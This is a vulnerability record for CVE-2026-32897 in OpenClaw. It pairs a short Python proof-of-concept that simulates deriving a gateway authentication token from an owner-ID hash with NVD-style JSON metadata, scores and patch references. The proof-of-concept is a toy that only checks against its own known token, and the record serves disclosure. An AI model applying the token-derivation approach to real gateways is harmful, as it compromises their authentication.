CVE-2026-32897

import hmac import hashlib # Proof of Concept: Demonstrating how the token reuse allows derivation. # Scenario: Attacker has access to the system prompt containing the hash. # Configuration simulation GATEWAY_AUTH_TOKEN = "super_secret_auth_token_123" OWNER_ID = "admin_user" # Vulnerable Logic: Using auth token as hash secret def vulnerable_hash_logic(owner_id, auth_token): return hmac.new(auth_token.encode(), owner_id.encode(), hashlib.sha256).hexdigest() # 1. System generates the hash for the prompt hash_in_prompt = vulnerable_hash_logic(OWNER_ID, GATEWAY_AUTH_TOKEN) print(f"[System] Hash sent to 3rd party: {hash_in_prompt}") # 2. Attacker sees the hash and knows the Owner ID (often predictable or visible) attacker_known_hash = hash_in_prompt attacker_known_owner_id = OWNER_ID # 3. Attacker attempts to derive the token (Brute-force simulation) print("[Attacker] Starting offline derivation...") # In a real scenario, the attacker would use a dictionary of potential tokens or leaked passwords. # Here we simulate the verification step. found = False # Simulating a guess matching the real token if vulnerable_hash_logic(attacker_known_owner_id, GATEWAY_AUTH_TOKEN) == attacker_known_hash: print(f"[Attacker] Token Found: {GATEWAY_AUTH_TOKEN}") print("[Result] Gateway Authentication Compromised!") else: print("[Result] Token not found in dictionary.")

{"cve": {"id": "CVE-2026-32897", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:10.673", "lastModified": "2026-03-24T21:07:55.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 reuse gateway.auth.token as a fallback hash secret for owner-ID prompt obfuscation when commands.ownerDisplay is set to hash and commands.ownerDisplaySecret is unset, creating dual-use of authentication secrets across security domains. Attackers with access to system prompts sent to third-party model providers can derive the gateway authentication token from the hash outputs, compromising gateway authentication security."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.22 reutilizan gateway.auth.token como un secreto de hash de respaldo para la ofuscación de la solicitud de ID de propietario cuando commands.ownerDisplay está configurado como hash y commands.ownerDisplaySecret no está configurado, creando un doble uso de secretos de autenticación entre dominios de seguridad. Los atacantes con acceso a las solicitudes del sistema enviadas a proveedores de modelos de terceros pueden derivar el token de autenticación de la pasarela de las salidas del hash, comprometiendo la seguridad de la autenticación de la pasarela."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-320"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/c99e7696e6893083b256f0a6c88fb060f3a76fb7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v6x2-2qvm-6gv8", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authentication-token-reuse-in-owner-id-prompt-hashing-fallback", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}